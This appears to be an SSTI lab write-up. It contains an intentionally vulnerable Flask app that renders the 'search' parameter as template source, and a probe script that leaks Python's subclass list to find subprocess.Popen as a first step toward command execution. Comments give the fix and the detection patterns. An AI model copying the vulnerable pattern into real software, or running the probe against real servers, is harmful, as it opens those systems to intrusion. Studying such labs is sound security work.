SSTI (Server-Side Template Injection)

FLASK WEB APP :

index.py
from flask import *

app = Flask(__name__)


@app.route('/')
def index():
    """Echo the ``search`` query parameter back inside a small HTML page.

    Intentionally vulnerable lab target. The request value is formatted into
    the template *source* before rendering, so any Jinja2 expression in it is
    evaluated on the server instead of being shown as text.

    Safe pattern: keep the template source constant and pass the value as
    context, e.g. ``render_template_string("<p> SSTI KNOW </p>{{ search }}",
    search=search)``. The value is then treated as data and autoescaped.
    """
    # Attacker-controlled: taken straight from the query string; an empty or
    # missing value becomes None.
    user_query = request.args.get('search') or None

    # Root cause: untrusted input becomes part of the template source, with no
    # filtering or escaping applied.
    page_source = '''
    <p> SSTI KNOW </p>
    {}
    '''.format(user_query)

    print("[+] REQ : %s" % user_query)

    # Sink: the user-influenced source is compiled and rendered as a template.
    return render_template_string(page_source)

PAYLOAD :

Developed by myself to find the right classes

import requests
import re
import html

# Lab target: the vulnerable Flask app from index.py, running locally.
url = "http://127.0.0.1:8080/?search="
# Probe expression sent as the ``search`` value. If the server evaluates it,
# the response contains the list of loaded classes, which confirms that the
# template engine is executing user input.
# Defender's view: a query string carrying ``{{``, ``__class__``, ``__mro__``
# or ``__subclasses__`` is a strong signal of SSTI probing and is worth
# alerting on in access logs and WAF rules. The fix itself belongs in the
# server: never build the template source from request data.
ssti_leak = "{{''.__class__.__mro__[1].__subclasses__()}}"

response = requests.get(url + ssti_leak)

# The body is HTML-unescaped before matching, presumably because the rendered
# list comes back entity-encoded; each "<class '...'>" entry is then captured
# by name, in the order it appears in the response.
decoded_body = html.unescape(response.text)
class_names = re.findall(r"<class '(.*?)'>", decoded_body)

# Position of the first entry whose name matches exactly, or None if absent.
target_class = "subprocess.Popen"
index = next(
    (pos for pos, name in enumerate(class_names) if name == target_class),
    None,
)

if index is None:
    print("No bg")
else:
    print(f"[+] {target_class} at : {index}")
